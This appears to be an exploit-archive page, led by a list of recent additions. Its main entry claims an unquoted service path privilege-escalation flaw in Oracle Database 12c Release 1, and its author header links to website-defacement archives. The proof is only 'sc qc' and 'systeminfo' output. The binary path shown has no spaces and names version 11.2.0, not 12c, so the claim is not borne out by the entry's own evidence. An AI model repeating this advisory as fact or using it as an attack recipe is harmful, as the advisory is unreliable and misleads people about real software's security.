
6 changes to exploits/shellcodes/ghdb Ivanti vADC 9.9 - Authentication Bypass Devika v1 - Path Traversal via 'snapshot_path' Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Oracle Database 12c Release 1 - Unquoted Service Path SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path
31 lines
No EOL
1 KiB
Text
31 lines
No EOL
1 KiB
Text
# Exploit Title: Oracle Database 12c Release 1 - Unquoted Service Path
|
|
# Date: 2024-07-31
|
|
# Exploit Author: Milad Karimi (Ex3ptionaL)
|
|
# Contact: miladgrayhat@gmail.com
|
|
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
|
|
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
|
|
# Vendor Homepage: https://www.oracle.com/
|
|
# Software Link: https://www.oracle.com/
|
|
# Version: 12c Release 1
|
|
# Tested on: Windows 10 Pro x64
|
|
|
|
C:\>sc qc "OracleDBConsoleorcl"
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: OracleDBConsoleorcl
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME :
|
|
C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : OracleDBConsoleorcl
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
C:\>systeminfo
|
|
|
|
OS Name: Microsoft Windows 10 Pro
|
|
OS Version: 10.0.19045 N/A Build 19045
|
|
OS Manufacturer: Microsoft Corporation |